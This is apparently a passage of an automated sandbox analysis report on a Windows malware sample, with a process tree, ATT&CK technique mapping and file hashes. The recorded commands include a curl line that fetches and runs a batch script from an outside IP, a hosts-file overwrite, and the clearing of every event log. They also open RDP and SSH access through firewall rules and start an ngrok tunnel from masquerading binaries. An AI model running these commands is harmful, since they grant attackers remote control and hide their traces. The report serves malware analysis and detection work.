PID:5984 -
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:6076
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:1540
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:6120
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:6100
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:6048
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:6056
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:4916
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:956
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:6072
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\re-install.bat"4⤵
- Drops file in Program Files directory
PID:5380 -
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:2504
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -u5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1004 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1576
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -i -o5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5432 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5612
-
-
-
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:5908
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:5776
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:5272
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:1632
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:5504
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:8
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:3108
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:3632
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:1532
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"4⤵PID:4728
-
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:3112
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:105⤵
- Scheduled Task/Job: Scheduled Task
PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"4⤵
- Drops file in Program Files directory
PID:5032 -
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:4628
-
-
C:\Windows\system32\sc.exesc queryex "TermService"5⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\system32\find.exefind "STATE"5⤵PID:1160
-
-
C:\Windows\system32\find.exefind /v "RUNNING"5⤵PID:3156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp5⤵PID:3148
-
C:\Windows\system32\query.exequery session rdp-tcp6⤵PID:4224
-
C:\Windows\system32\qwinsta.exe"C:\Windows\system32\qwinsta.exe" rdp-tcp7⤵PID:860
-
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"5⤵
- Server Software Component: Terminal Services DLL
PID:5716
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5752 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3480
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2488 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4408
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f5⤵PID:4788
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f5⤵PID:2712
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"5⤵PID:5852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"5⤵PID:3324
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"6⤵PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul5⤵PID:3764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"6⤵PID:2592
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f5⤵PID:1692
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"5⤵PID:4392
-
-
C:\Windows\system32\PING.EXEping -n 1 google.com5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵PID:2716
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"6⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
PID:4308
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5932 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5856
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5976 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4016
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f5⤵PID:5940
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f5⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"5⤵PID:1444
-
-
-
-
C:\Windows\system32\Dism.exedism /Online /Add-Capability /CapabilityName:OpenSSH.Server~~~~0.0.1.03⤵
- Drops file in Windows directory
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exeC:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exe {ABEAF7D4-C56A-488F-8743-53BA106065BB}4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2792
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-Service -Name sshd -StartupType 'Automatic'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Service sshd3⤵PID:3748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 223⤵PID:3384
-
-
C:\Windows\system32\cmd.execmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""3⤵PID:5168
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6340 /prefetch:82⤵PID:4616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6892 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6924 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:12⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵PID:5856
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2032
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4080
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵PID:1080
-
C:\ProgramData\Windata\winlogin.exeC:\ProgramData\Windata\winlogin.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C del %programdata%\Windata\update.bat && curl http://152.89.239.119/update.bat -o %programdata%\Windata\update.bat && cmd /C %programdata%\Windata\update.bat2⤵
- System Location Discovery: System Language Discovery
PID:4816 -
C:\Windows\SysWOW64\curl.execurl http://152.89.239.119/update.bat -o C:\ProgramData\Windata\update.bat3⤵PID:4500
-
-
C:\Windows\SysWOW64\cmd.execmd /C C:\ProgramData\Windata\update.bat3⤵
- System Location Discovery: System Language Discovery
PID:5272 -
C:\Windows\SysWOW64\cmd.execmd /C "attrib -r c:\Windows\System32\Drivers\etc\hosts"4⤵
- System Location Discovery: System Language Discovery
PID:5292 -
C:\Windows\SysWOW64\attrib.exeattrib -r c:\Windows\System32\Drivers\etc\hosts5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C "echo 197.206.92.151 262626.ddns.net > c:\Windows\System32\Drivers\etc\hosts"4⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:5328
-
-
-
-
C:\ProgramData\Windata\WindowsUpdate.exeC:\ProgramData\Windata\WindowsUpdate.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C %programdata%\Windata\ngrok.exe start --all2⤵
- System Location Discovery: System Language Discovery
PID:4764 -
C:\ProgramData\Windata\ngrok.exeC:\ProgramData\Windata\ngrok.exe start --all3⤵
- Executes dropped EXE
PID:1580
-
-
-
C:\ProgramData\Windata\srlhost.exeC:\ProgramData\Windata\srlhost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4068
-
C:\ProgramData\Windata\smhost.exeC:\ProgramData\Windata\smhost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3300 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\Windata\smhost.exe" "smhost.exe" ENABLE2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5812
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:2280
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:5988
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2472
-
C:\Windows\System32\OpenSSH\sshd.exeC:\Windows\System32\OpenSSH\sshd.exe1⤵PID:5964
-
C:\Windows\System32\OpenSSH\ssh-keygen.exessh-keygen -A2⤵PID:5992
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Indicator Removal
1File Deletion
1Modify Registry
5Discovery
Browser Information Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
3Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
132KB
MD5d3c90f02de548c8dea592f6d2a0e3feb
SHA13c70944d08059e1fd4be347c8a56dddf41a63f16
SHA256c0055252f5a1e8f3d9750cebdefee565b160b572ac6977917c78bd5452802ebb
SHA5126a0164d5780f1af9582fb2a328c3134f5cba4c50b905d5c9216ea22eb3f5475846599c0e98e1a9d98bf5002ecd1c6975087ef85089b1823482ca15ee20ad89ec
-
Filesize
1.5MB
MD50220e75b22e87585fa065121761e9e2d
SHA13c2b019c4bde007ffca05bca8b75ad3951a4a9a0
SHA2566acb1127d03b01b533501943a559e2ef33be1788cbf9b64d5617ae5ccba92446
SHA512fc15b01b0e13f0288f49e70c5294a3643dda73edd2ed48697b61f0f445379e189a41d626e650644f50e71d04543a67d68592f7ce4d057e6eeaa5aff25ce1bc07
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
467B
MD59452c0d63dc4f88da0481614140e79fd
SHA129438e77698d93b2766a363f990addc4499366be
SHA2569db73248dc3ab80f2cde20a5181d572eeac056e9ce79b21c866498c34fe62ce3
SHA5121fce942c4b5f2cf905eddd34ec59b254e8f8b27d970e407e2a3c880397dba5b3a058c27cccdfa3447a1856eb2288d6e4f66dec1a8b2db71a9214e904e47a1df4
-
Filesize
8.4MB
MD5ef99156228bf3926729f9682cef708e9
SHA17e02bd51e5be7e98454434c030e6cc583876f63b
SHA256dc28f606067f7fe980c033c27d7365ed761dce0ad398095e495fdfd26e0b4f51
SHA512033bd685dd744c5de93be64d221a41d06224261a28401d7a125db4824c22814eb410903a162e946fcc3dfe386b164759c276dc6b264c307cfdf295441f28cef1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5f9664c896e19205022c094d725f820b6
SHA1f8f1baf648df755ba64b412d512446baf88c0184
SHA2567121d84202a850791c2320385eb59eda4d697310dc51b1fcd4d51264aba2434e
SHA5123fa5d2c68a9e70e4a25eaac2095171d87c741eec2624c314c6a56f4fa390d6319633bf4c48b1a4af7e9a0451f346beced9693da88cfc7bcba8dfe209cbd1b3ae
-
Filesize
152B
MD5847d47008dbea51cb1732d54861ba9c9
SHA1f2099242027dccb88d6f05760b57f7c89d926c0d
SHA25610292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1
SHA512bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize984B
MD5078b01fedc34ff3e851b72d5a2a97991
SHA196e87df9f2738b2f7cbea631b6a9dad6c123ea18
SHA2564f1f15c1765afabc3281d690499d92f389530a865c7ea0630dc85875c14cf106
SHA5122e7f610f3becb9da1c8b40e1687615d8c2265ef1a347ae2cdd760395602f5901ef2c286eb86afa0ad0bacdc527eacf0dce2c842755c57f4d16b3a8254edd2948
-
Filesize
380B
MD5b7a794ca9b7387f7068d9c94947a9abf
SHA1de6e5ef2967e492a846f62bdee502431602f254c
SHA25659a4a3aa9b33fb018861ee9dbefe531a2beaea27b2711accc329f0e515fab1cc
SHA5127c305e8dfafd210e32daa85574ceec61b951090b8c857e3973901a674701f466a2b10008d02718f5b63b080647d6eead2b83c00360c8e267902a89c0e1c8e8f3
-
Filesize
868B
MD540e9f19177ef430751e84f10a6e1ba56
SHA1ca86be73fbf1cf5f39b25d4425ebc1f7c23596e5
SHA2563d319e6efb048b84119f7cdd1121d9168e2bbd5da1dc1f34cc781b97d8b11b14
SHA512ef244ed362e059729b926cf588ce0543864ba33df57e479018a0629b9402ff9802475d91f472d21d4ff75d4d6291b03af5ac5a506ca7b98c57b354c7d2a88df3
-
Filesize
6KB
MD563320375d707a3d42109ac49d6956c4d
SHA1a030d515745397be5c6eb02dcdc27450e78e779d
SHA2560e57191471d17bbc8ceeefcd80d344982393aa7c9deaf783da3d7269732e3399
SHA512f0e8f02ee363d93ced7100997ecd1362c70bfb1b40f2d079fbaec177119a89f60cc2a461a68072418fac9f368c5b0458518856db5e06fa09b4399fe295e1371c
-
Filesize
6KB
MD5995850accc7f3a340c28a8f79365c00e
SHA19e169de3b851fdf4bad38f38317435fcc1f39a3f
SHA25682fe6d5d014c681d45db971025ab0ebf18d37eafcd385fb3d23d40e2f5b05fb9
SHA5127d68aaaf04031e50d908781f2d5cc05dfccfa158b729641a370d3a17c7d27e588af04c2fb18145ae1491ab2d283cef25d9e25e9538c53c3cef8411a113f39387
-
Filesize
7KB
MD594fee34863afb67c36da09bc71687ee1
SHA1f37d38d2a6f9259e423273ac7d16ad2e5cdad2a6
SHA256a506780bccbd540424740f06f3f8e1b35cba80a6a0170c0dbcc702e5397a4d09
SHA51284db7a50b2b50136aaaf16de89a8e2da81fd716847a190001c860817453434fa69acf06df3dd93763320734c6b78ea8766fdffe39f98079c8397a7b308f9b7b7
-
Filesize
7KB
MD537346b0606f33f5bc78a0f35745dc765
SHA10d35754206b79876507f6d8a4ece678f6b7e9f3b
SHA256948bf99504ebde0e2cce39b0ecbfdc0fa485115f91da646d36107a9f8647cd6f
SHA5123fe0d5ab804ee73c0fe9286dcf00e0502b443999c5ad1d6ee43b61c627a2d4767a59aded045187f4347fbd901011f6c9651d684b6f1497d5c173c37fbc4427a3
-
Filesize
6KB
MD59530fc372d1bab13fb047e8cfb0e8e9d
SHA11ea66eebb479d8052d50c8ff3fc6c7d9158a3ecd
SHA256d249b2634250bea1ba8f86f8f561683741cb0e4b7254c7064aab5b0453bedaa2
SHA512f5a169eed2cc57b0db8d1f2243b20a8cbbb1b878b4477596e0ac2000083b6b972406e05173a224d85389ee9a10b4c11e9e14ac9ae1a25086b63b88d682145a98
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e173761c-6616-43a4-b319-bfbc2f6231a8.tmp
Filesize5KB
MD5947818cf253517855ee3d13f1d96fa4e
SHA14bd4c8f30f61384c3ffe8a93a01683214763ae77
SHA2567f4624c293212b0215f9fb3768b776abf544f971269cc8c8e5786f10428cc021
SHA512bca3ea4d4d447f30a975f1b0c3f0c1ff49e6f5626f33289d2c89b288b0c26d68253d8d8aa3cafa9b894cf1e2b7c9284d8a86c6ad54f9f4c2e421b30e41321157
-
Filesize
10KB
MD50f6504277d288ecec56ffb07227a5d45
SHA1a94509b5987d43c2e2f676f7ffe1ef5828f8419e
SHA256a9c9e9347528423f947898f297ad1ac7b6ed1794d504ca26b2007b4c36a70830
SHA5125e528826be3b986d4218436be5789df29a9b0f0674a618df706b68c574014ed7eb5522119e953a8461526d1a90e35fc78fc5813f67bde395aee7ef8b4ab40cd0
-
Filesize
11KB
MD5d06d00300260a1c407604deb6131ea35
SHA109427220a24f3a3783dc38915603f3614c3deedf
SHA256cb5d6f0089b890ea8928167b8773f45f197d0bda81b6b3d3a03bc4c27940add2
SHA512e5c7eca456a98ed69ef21c4e54db9378f43f09ed44ac86e4c5c095e663ca262c455bd13784e6a0b13581194b8f847ae46ed1db3bda11bfbc55f28bdd2e05f054
-
Filesize
11KB
MD501d56d9445ea91afcd510a3dd38c3019
SHA129c700c693f7a57e2626bc930430629d0bd76758
SHA256e3fd4c8a36ec545edf8aad247fd2e0f8cde172b214abac6acb8d9816010b6582
